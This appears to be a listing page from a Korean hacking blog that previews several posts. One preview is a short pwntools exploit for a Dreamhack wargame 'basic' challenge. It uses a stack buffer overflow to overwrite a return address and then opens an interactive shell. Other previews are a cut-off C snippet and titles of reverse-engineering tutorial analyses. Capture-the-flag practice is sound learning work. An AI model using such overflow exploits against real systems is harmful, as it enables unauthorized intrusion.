hacking sorcerer (373) 썸네일형 리스트형 드림핵 basic from pwn import * r = remote("host1.dreamhack.games", 15232) payload = b'a'*0x80 + b"AAAA" + p32(0x80485b9) r.sendline(payload) r.interactive() 직관에 부합하면서 직관을 벗어나는 답 #include #include #include int main(void) { while(1){ char str[10] = {}; int b[10] = {}; int s=0; scanf("%s", str); if (str[0] == "#") exit(0); int panda = strlen(str); for (int i = 0; i 무언의 레나튜토리얼 분석 05 무언의 레나튜토리얼 분석 05 무언의 레나튜토리얼 분석 04 무언의 레나튜토리얼 분석 03 무언의 레나튜토리얼 분석 02 무언의 레나튜토리얼 분석 01 이전 1 ··· 29 30 31 32 33 34 35 ··· 47 다음